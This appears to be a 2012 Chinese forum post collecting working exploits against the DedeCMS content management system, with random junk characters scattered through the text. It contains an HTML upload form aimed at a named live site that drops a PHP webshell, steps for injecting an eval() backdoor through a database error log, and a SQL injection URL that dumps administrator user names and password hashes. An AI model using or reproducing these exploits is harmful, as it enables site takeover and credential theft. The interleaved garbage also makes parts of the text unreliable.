<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
' i- v& S( [9 b. B, y</head>8 q0 S* t6 ]: T) k7 r5 B+ I
<body style="FONT-SIZE: 9pt">7 u* y( M7 G2 o: u1 d0 s, x+ J
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />. S% ]6 s4 r; K/ ?" P. m: N& N2 H
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>4 i, i4 F2 j. [
<input type='hidden' name='activepath' value='/data/cache/' />
8 m* G7 s5 C) [+ q/ \<input type='hidden' name='cfg_basedir' value='../../' />
6 f- `0 k5 N5 c) H1 p<input type='hidden' name='cfg_imgtype' value='php' />
! v3 U2 ~; g7 h/ d! i' F w<input type='hidden' name='cfg_not_allowall' value='txt' />
9 w5 ?5 s$ F8 k3 ]9 K: Z8 L<input type='hidden' name='cfg_softtype' value='php' />
3 y5 C. d, H) [( ]" f3 v1 \, L _4 `; s<input type='hidden' name='cfg_mediatype' value='php' />
2 \$ A; _ o' Y) `4 O, Y8 ?<input type='hidden' name='f' value='form1.enclosure' />
, z" ^, N7 ]/ G% ?( ` O<input type='hidden' name='job' value='upload' />/ C2 ^. g- m0 _7 n6 N& K$ e
<input type='hidden' name='newname' value='fly.php' />
# v* U3 V+ O m8 jSelect U Shell <input type='file' name='uploadfile' size='25' />
, h5 g3 a# h' s# v8 ]: z1 Q/ b9 A<input type='submit' name='sb1' value='确定' />
% K* o/ f# ^9 r</form>4 a! w0 v6 I0 U+ @6 i" C7 A
<br />It's just a exp for the bug of Dedecms V55...<br /># Y w) x9 y q3 `5 P) j e2 C
Need register_globals = on...<br />
& B0 a9 m/ E$ I9 U+ a: v4 G( \; gFun the game,get a webshell at /data/cache/fly.php...<br />! b( H i4 W- v% @0 o$ ]9 k. _
</body>5 ]' u" d2 f4 L7 M7 _4 Y4 q
</html>
2 h6 d# T& n# H9 T; x/ k
& x6 }& @+ w$ L6 N; `
4 c" k3 Q# c6 I7 Z8 L. t: u. w* p. `! K4 r4 z" ]' ?
; G A- u! `% F4 [9 O& S
) B2 j2 }* h! z4 u, t! x& C ^2 t
' b, X0 }4 R! c
. e" L/ K [$ x s2 I" F6 i, ]3 l0 e+ @$ F, [
5 B/ x: W0 L. D9 `1 n. y! ?
# D2 D3 Z* h5 O- R. S织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞9 Y4 F4 V- ?" ~( t$ ~( [
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
& T- T' N7 N0 @' Y! \& K+ a7 X1. 访问网址:. ]& s1 l5 P( [' i( d( A4 I2 \1 |! H
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
0 u0 q7 U' p+ w8 f* P可看见错误信息, W( s- a+ j3 ]
8 y2 N, {) r% @4 ]' O M+ b
! V$ Z4 j: i7 @
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
" H3 ^# h- @ H# jint(3) Error: Illegal double '1024e1024' value found during parsing
1 b# y6 h0 r( z* q) p6 C# a; X" vError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>* `% K$ Y, t+ I& k; U3 q
5 e' Z, I' s& V) y- l) h
) d5 U# ^5 a; ^9 f: {3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
; b5 C3 y. r& k( B1 o( [7 x! q) n9 G
/ F- X/ L' s6 X) ]
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>" N B: `, \8 I) M) b% F
2 a- V9 }4 ^, @% J3 h. K# S' r$ J) y/ U I' H& P: C
按确定后的看到第2步骤的信息表示文件木马上传成功.! W3 T0 t: q' c
6 A+ g0 Y$ O4 ]$ P
: y/ T: a$ `) O# {& i+ p3 b* x- A% |% Z, W' w1 X* N! i. I
% e p4 c6 @* E% ~* p0 E9 o1 j
* X7 n8 A# Q; i/ }$ ]- a% @% M
4 K# b' M& U$ y" r3 d+ ]% E5 j
8 ]8 F# p8 `3 J+ S# w" J
d$ P" i5 K0 `7 x3 G/ |7 D2 }6 \, t* b, W8 |$ c1 {6 Y
0 Y# y* h' j( X* `: K3 I! [- }. G, ?! B6 |
' j- @ O" k2 H! v$ q织梦(DedeCms)plus/infosearch.php 文件注入漏洞
! v8 n p$ [% V8 ?4 Ahttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对